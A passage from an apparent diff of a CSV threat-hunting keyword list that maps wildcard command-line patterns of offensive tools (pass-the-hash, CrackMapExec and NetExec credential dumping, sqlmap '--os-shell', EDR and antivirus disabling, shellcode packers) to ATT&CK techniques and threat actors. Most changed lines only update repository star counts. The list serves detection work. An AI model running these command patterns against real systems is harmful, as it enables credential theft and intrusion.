T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* tso-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* tso-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* tweetshell.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"* tweetshell.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential 
Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" "* --type asreproast*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" "* --type search-spn*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" "* -Type SMBClient -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -Type SMBEnum -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -Type SMBExec -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" -"* -type user -search * -DomainController * -Credential * -list yes*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -type user -search * -DomainController * -Credential * -list yes*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Type WMIExec -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -u * -d * --dc-ip * -k --no-pass --target * --action ""list""*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" -"* -u * --local-auth*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -u * -p * --lusers*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -u * -p * -M handlekatz*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -u * -p * -M nanodump*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -u * -p * -M ntdsutil*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -u * -p * --sam","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -u * -p * --shares*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -u * -p *--pass-pol*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -u *http* --dbs","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* -u *http* --os-shell*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* -u FUZZ *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -u http* -f *.dll * -p *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* -u * --local-auth*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p * --lusers*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p * -M handlekatz*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -u * -p * -M nanodump*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -u * -p * -M ntdsutil*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -u * -p * --sam","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p * --shares*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p *--pass-pol*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u *http* --dbs","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* -u *http* --os-shell*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* -u FUZZ *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -u http* -f *.dll * -p *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "* -U msf -P msf *","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"* -u wordlist * wordlist_uniq_sorted*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","0","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z" +"* -u wordlist * 
wordlist_uniq_sorted*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","0","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" "* uberfile.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* ubiquiti-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --unconstrained-users*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","0","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "* unDefender.exe*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "* -unhook -antidebug * -self -sleep*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -unhook -syscalls -obfuscate *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"* --unhook-method * --dont-unload-driver * --dump-output *","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"* --unhook-method * --dont-unload-driver * --dump-output *","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "* unicorn.py*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" -"* --union-char *GsFRts2*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --union-char *GsFRts2*","offensive_tool_keyword","sqlmap","Automatic SQL 